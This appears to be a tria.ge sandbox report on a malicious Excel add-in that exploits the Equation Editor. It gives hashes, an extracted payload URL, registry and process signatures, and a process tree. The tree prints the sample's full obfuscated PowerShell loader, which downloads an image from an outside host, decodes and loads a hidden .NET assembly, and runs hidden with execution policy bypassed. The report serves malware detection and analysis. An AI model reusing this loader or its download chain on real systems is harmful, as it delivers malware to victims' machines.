Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
118s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20231023-en -
resource tags
arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system -
submitted
29/10/2023, 01:21
Static task
static1
Behavioral task
behavioral1
Sample
cffadf4bee42624c634e37a15e3da2aa08cc080e359df25b39fdda5645a62f31.xlam
Resource
win7-20231023-en
Behavioral task
behavioral2
Sample
cffadf4bee42624c634e37a15e3da2aa08cc080e359df25b39fdda5645a62f31.xlam
Resource
win10v2004-20231023-en
General
-
Target
cffadf4bee42624c634e37a15e3da2aa08cc080e359df25b39fdda5645a62f31.xlam
-
Size
668KB
-
MD5
41b8a5aadded29c7ef57e41bb0102152
-
SHA1
ab78de829952f86e61f2fa351ce7bddf0c4a23bb
-
SHA256
cffadf4bee42624c634e37a15e3da2aa08cc080e359df25b39fdda5645a62f31
-
SHA512
6d31fc6ce6de3ffc4cc84fe3207e10c52e5ef31986293442b0f9214dae4c914661e574b857958ff8ea290b4961b6e025a610f375bde144d47eb610bdaff487ba
-
SSDEEP
12288:OK+e21N8IWOpr1Mu+VXSnuM95oOVPMX6Yyhf69cHhIAIY+2AmSMIHgJjAbDs2sd:O02f8+prO1VXk5oa564kTdZHCkYz
Malware Config
Extracted
https://imageupload.io/ib/63jq5ylJrw9KxLq_1696608110.jpg
https://imageupload.io/ib/63jq5ylJrw9KxLq_1696608110.jpg
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 2536 EQNEDT32.EXE 6 1480 powershell.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
pid Process 2536 EQNEDT32.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Toolbar EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\MenuExt EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command EXCEL.EXE -
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open" EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32 EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2892 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2484 powershell.exe 1480 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2484 powershell.exe Token: SeDebugPrivilege 1480 powershell.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 2892 EXCEL.EXE 2892 EXCEL.EXE 2892 EXCEL.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2536 wrote to memory of 2660 2536 EQNEDT32.EXE 30 PID 2536 wrote to memory of 2660 2536 EQNEDT32.EXE 30 PID 2536 wrote to memory of 2660 2536 EQNEDT32.EXE 30 PID 2536 wrote to memory of 2660 2536 EQNEDT32.EXE 30 PID 2660 wrote to memory of 2484 2660 WScript.exe 31 PID 2660 wrote to memory of 2484 2660 WScript.exe 31 PID 2660 wrote to memory of 2484 2660 WScript.exe 31 PID 2660 wrote to memory of 2484 2660 WScript.exe 31 PID 2484 wrote to memory of 1480 2484 powershell.exe 34 PID 2484 wrote to memory of 1480 2484 powershell.exe 34 PID 2484 wrote to memory of 1480 2484 powershell.exe 34 PID 2484 wrote to memory of 1480 2484 powershell.exe 34
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\cffadf4bee42624c634e37a15e3da2aa08cc080e359df25b39fdda5645a62f31.xlam1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2892
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2536 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\yhgdrypl.js"2⤵
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'J�✘Bp�✘G0�✘YQBn�✘GU�✘VQBy�✘Gw�✘I�✘�✘9�✘C�✘�✘JwBo�✘HQ�✘d�✘Bw�✘HM�✘Og�✘v�✘C8�✘aQBt�✘GE�✘ZwBl�✘HU�✘c�✘Bs�✘G8�✘YQBk�✘C4�✘aQBv�✘C8�✘aQBi�✘C8�✘Ng�✘z�✘Go�✘cQ�✘1�✘Hk�✘b�✘BK�✘HI�✘dw�✘5�✘Es�✘e�✘BM�✘HE�✘Xw�✘x�✘DY�✘OQ�✘2�✘DY�✘M�✘�✘4�✘DE�✘MQ�✘w�✘C4�✘agBw�✘Gc�✘Jw�✘7�✘CQ�✘dwBl�✘GI�✘QwBs�✘Gk�✘ZQBu�✘HQ�✘I�✘�✘9�✘C�✘�✘TgBl�✘Hc�✘LQBP�✘GI�✘agBl�✘GM�✘d�✘�✘g�✘FM�✘eQBz�✘HQ�✘ZQBt�✘C4�✘TgBl�✘HQ�✘LgBX�✘GU�✘YgBD�✘Gw�✘aQBl�✘G4�✘d�✘�✘7�✘CQ�✘aQBt�✘GE�✘ZwBl�✘EI�✘eQB0�✘GU�✘cw�✘g�✘D0�✘I�✘�✘k�✘Hc�✘ZQBi�✘EM�✘b�✘Bp�✘GU�✘bgB0�✘C4�✘R�✘Bv�✘Hc�✘bgBs�✘G8�✘YQBk�✘EQ�✘YQB0�✘GE�✘K�✘�✘k�✘Gk�✘bQBh�✘Gc�✘ZQBV�✘HI�✘b�✘�✘p�✘Ds�✘J�✘Bp�✘G0�✘YQBn�✘GU�✘V�✘Bl�✘Hg�✘d�✘�✘g�✘D0�✘I�✘Bb�✘FM�✘eQBz�✘HQ�✘ZQBt�✘C4�✘V�✘Bl�✘Hg�✘d�✘�✘u�✘EU�✘bgBj�✘G8�✘Z�✘Bp�✘G4�✘ZwBd�✘Do�✘OgBV�✘FQ�✘Rg�✘4�✘C4�✘RwBl�✘HQ�✘UwB0�✘HI�✘aQBu�✘Gc�✘K�✘�✘k�✘Gk�✘bQBh�✘Gc�✘ZQBC�✘Hk�✘d�✘Bl�✘HM�✘KQ�✘7�✘CQ�✘cwB0�✘GE�✘cgB0�✘EY�✘b�✘Bh�✘Gc�✘I�✘�✘9�✘C�✘�✘Jw�✘8�✘Dw�✘QgBB�✘FM�✘RQ�✘2�✘DQ�✘XwBT�✘FQ�✘QQBS�✘FQ�✘Pg�✘+�✘Cc�✘Ow�✘k�✘GU�✘bgBk�✘EY�✘b�✘Bh�✘Gc�✘I�✘�✘9�✘C�✘�✘Jw�✘8�✘Dw�✘QgBB�✘FM�✘RQ�✘2�✘DQ�✘XwBF�✘E4�✘R�✘�✘+�✘D4�✘Jw�✘7�✘CQ�✘cwB0�✘GE�✘cgB0�✘Ek�✘bgBk�✘GU�✘e�✘�✘g�✘D0�✘I�✘�✘k�✘Gk�✘bQBh�✘Gc�✘ZQBU�✘GU�✘e�✘B0�✘C4�✘SQBu�✘GQ�✘ZQB4�✘E8�✘Zg�✘o�✘CQ�✘cwB0�✘GE�✘cgB0�✘EY�✘b�✘Bh�✘Gc�✘KQ�✘7�✘CQ�✘ZQBu�✘GQ�✘SQBu�✘GQ�✘ZQB4�✘C�✘�✘PQ�✘g�✘CQ�✘aQBt�✘GE�✘ZwBl�✘FQ�✘ZQB4�✘HQ�✘LgBJ�✘G4�✘Z�✘Bl�✘Hg�✘TwBm�✘Cg�✘J�✘Bl�✘G4�✘Z�✘BG�✘Gw�✘YQBn�✘Ck�✘Ow�✘k�✘HM�✘d�✘Bh�✘HI�✘d�✘BJ�✘G4�✘Z�✘Bl�✘Hg�✘I�✘�✘t�✘Gc�✘ZQ�✘g�✘D�✘�✘I�✘�✘t�✘GE�✘bgBk�✘C�✘�✘J�✘Bl�✘G4�✘Z�✘BJ�✘G4�✘Z�✘Bl�✘Hg�✘I�✘�✘t�✘Gc�✘d�✘�✘g�✘CQ�✘cwB0�✘GE�✘cgB0�✘Ek�✘bgBk�✘GU�✘e�✘�✘7�✘CQ�✘cwB0�✘GE�✘cgB0�✘Ek�✘bgBk�✘GU�✘e�✘�✘g�✘Cs�✘PQ�✘g�✘CQ�✘cwB0�✘GE�✘cgB0�✘EY�✘b�✘Bh�✘Gc�✘LgBM�✘GU�✘bgBn�✘HQ�✘a�✘�✘7�✘CQ�✘YgBh�✘HM�✘ZQ�✘2�✘DQ�✘T�✘Bl�✘G4�✘ZwB0�✘Gg�✘I�✘�✘9�✘C�✘�✘J�✘Bl�✘G4�✘Z�✘BJ�✘G4�✘Z�✘Bl�✘Hg�✘I�✘�✘t�✘C�✘�✘J�✘Bz�✘HQ�✘YQBy�✘HQ�✘SQBu�✘GQ�✘ZQB4�✘Ds�✘J�✘Bi�✘GE�✘cwBl�✘DY�✘N�✘BD�✘G8�✘bQBt�✘GE�✘bgBk�✘C�✘�✘PQ�✘g�✘CQ�✘aQBt�✘GE�✘ZwBl�✘FQ�✘ZQB4�✘HQ�✘LgBT�✘HU�✘YgBz�✘HQ�✘cgBp�✘G4�✘Zw�✘o�✘CQ�✘cwB0�✘GE�✘cgB0�✘Ek�✘bgBk�✘GU�✘e�✘�✘s�✘C�✘�✘J�✘Bi�✘GE�✘cwBl�✘DY�✘N�✘BM�✘GU�✘bgBn�✘HQ�✘a�✘�✘p�✘Ds�✘J�✘Bj�✘G8�✘bQBt�✘GE�✘bgBk�✘EI�✘eQB0�✘GU�✘cw�✘g�✘D0�✘I�✘Bb�✘FM�✘eQBz�✘HQ�✘ZQBt�✘C4�✘QwBv�✘G4�✘dgBl�✘HI�✘d�✘Bd�✘Do�✘OgBG�✘HI�✘bwBt�✘EI�✘YQBz�✘GU�✘Ng�✘0�✘FM�✘d�✘By�✘Gk�✘bgBn�✘Cg�✘J�✘Bi�✘GE�✘cwBl�✘DY�✘N�✘BD�✘G8�✘bQBt�✘GE�✘bgBk�✘Ck�✘Ow�✘k�✘Gw�✘bwBh�✘GQ�✘ZQBk�✘EE�✘cwBz�✘GU�✘bQBi�✘Gw�✘eQ�✘g�✘D0�✘I�✘Bb�✘FM�✘eQBz�✘HQ�✘ZQBt�✘C4�✘UgBl�✘GY�✘b�✘Bl�✘GM�✘d�✘Bp�✘G8�✘bg�✘u�✘EE�✘cwBz�✘GU�✘bQBi�✘Gw�✘eQBd�✘Do�✘OgBM�✘G8�✘YQBk�✘Cg�✘J�✘Bj�✘G8�✘bQBt�✘GE�✘bgBk�✘EI�✘eQB0�✘GU�✘cw�✘p�✘Ds�✘J�✘B0�✘Hk�✘c�✘Bl�✘C�✘�✘PQ�✘g�✘CQ�✘b�✘Bv�✘GE�✘Z�✘Bl�✘GQ�✘QQBz�✘HM�✘ZQBt�✘GI�✘b�✘B5�✘C4�✘RwBl�✘HQ�✘V�✘B5�✘H�✘�✘ZQ�✘o�✘Cc�✘RgBp�✘GI�✘ZQBy�✘C4�✘S�✘Bv�✘G0�✘ZQ�✘n�✘Ck�✘Ow�✘k�✘G0�✘ZQB0�✘Gg�✘bwBk�✘C�✘�✘PQ�✘g�✘CQ�✘d�✘B5�✘H�✘�✘ZQ�✘u�✘Ec�✘ZQB0�✘E0�✘ZQB0�✘Gg�✘bwBk�✘Cg�✘JwBW�✘EE�✘SQ�✘n�✘Ck�✘LgBJ�✘G4�✘dgBv�✘Gs�✘ZQ�✘o�✘CQ�✘bgB1�✘Gw�✘b�✘�✘s�✘C�✘�✘WwBv�✘GI�✘agBl�✘GM�✘d�✘Bb�✘F0�✘XQ�✘g�✘Cg�✘JwB0�✘Hg�✘d�✘�✘u�✘G4�✘eQBt�✘C8�✘MQ�✘1�✘C4�✘Mw�✘z�✘C4�✘Mg�✘0�✘C4�✘Mw�✘5�✘DE�✘Lw�✘v�✘Do�✘c�✘B0�✘HQ�✘a�✘�✘n�✘C�✘�✘L�✘�✘g�✘Cc�✘Z�✘Bm�✘GQ�✘ZgBk�✘Cc�✘I�✘�✘s�✘C�✘�✘JwBk�✘GY�✘Z�✘Bm�✘Cc�✘I�✘�✘s�✘C�✘�✘JwBk�✘GY�✘Z�✘Bm�✘Cc�✘I�✘�✘s�✘C�✘�✘JwBk�✘GE�✘Z�✘Bz�✘GE�✘Jw�✘g�✘Cw�✘I�✘�✘n�✘GQ�✘ZQ�✘n�✘C�✘�✘L�✘�✘g�✘Cc�✘YwB1�✘Cc�✘KQ�✘p�✘�✘==';$OWjuxd = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($codigo.repl"ace('�✘','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxd"3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2484 -
